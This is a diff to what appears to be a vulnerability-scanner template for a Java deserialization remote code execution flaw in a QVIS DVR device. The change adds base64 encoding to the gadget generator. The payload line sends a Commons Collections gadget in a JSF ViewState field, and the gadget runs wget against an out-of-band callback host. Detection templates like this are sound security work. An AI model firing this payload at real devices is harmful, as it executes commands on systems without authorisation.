--- a/iot/qvisdvr-deserialization-rce.yaml
+++ b/iot/qvisdvr-deserialization-rce.yaml
@@ -27,7 +27,7 @@ requests:
         User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
         Content-Type: application/x-www-form-urlencoded
 
-        javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}")}}
+        javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
 
     extractors:
       - type: regex
